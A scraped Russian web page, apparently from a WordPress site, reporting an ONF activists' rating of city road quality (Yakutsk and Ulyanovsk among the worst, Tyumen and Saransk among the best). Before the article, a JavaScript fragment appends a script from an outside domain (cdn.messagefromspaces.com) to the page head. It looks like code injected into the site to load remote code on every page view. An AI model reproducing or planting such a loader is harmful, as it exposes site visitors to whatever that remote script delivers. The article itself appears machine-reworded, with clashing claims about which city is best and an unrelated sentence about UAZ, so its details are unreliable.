, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

wordpress themes.

Активисты ОНФ составили рейтинг городов по качеству дорог

Как проинформировали ТАСС в пресс-центре ОНФ, активисты лично проехали по меньшей мере 65 тыс. километров и узнали, что самыми никчемными являются дороги Якутска, Петропавловска-Камчатского и Ульяновска. Выбоины в этих городах в глубину и ширину превышают все допустимые нормы.

Лучшие дороги, по мнению общественников, в Тюмени, Саранске, Белгороде.

По результатам мероприятия была принята резолюция, которая будет направлена в руководство РФ.

Великий Новгород занял 110 место из 117 в рейтинге дорог, составленном дорожной инспекцией ОНФ и общественной организацией «Убитые дороги России». Правда, объёмы производств УАЗа уже не растут, чего не скажешь о количестве ям на местных трассах.

Тройку городов, где дороги с точки зрения ГОСТа у «фронтовиков» не вызвали претензий, возглавила Тюмень. Лучшим получил признание Саранск.

«Фронтовики» назвали не только лишь города с худшими дорогами, однако и города, где у проверяющих не появилось претензий. Среди них — Кодинск, Владикавказ, Смоленск, Махачкала, Воронеж, Магадан, Канск, Тулун, Набережные Челны, Шадринск. «Впоследствии областная генпрокуратура Ульяновской области после комплексной проверки подтвердила нашу информацию о том, что состояние автомобильных дорог там не соответствует условиям стандартов», — поведал директор инспекции, депутат Государственной думы Александр Васильев.

В том числе, активисты расценивали качество полотна гарантийных дорог, облагораживание пешеходных переходов неподалеку от важных инфраструктурных объектов, наличие парковок и пандусов (там, где они по закону должны быть, например, вблизи медицинских учреждений).

ОНФ презентовал качества дорог в России

Поделиться в соц. сетях


Вы можете пропустить чтение записи и оставить комментарий. Размещение ссылок запрещено.


Оставить комментарий


Использование материалов данного сайта запрещено, без активной гиперссылки на сайт - http://okinvest.ru.

Автор не несет ответственности за деятельность компаний, описанных на сайте. Уведомление о рисках.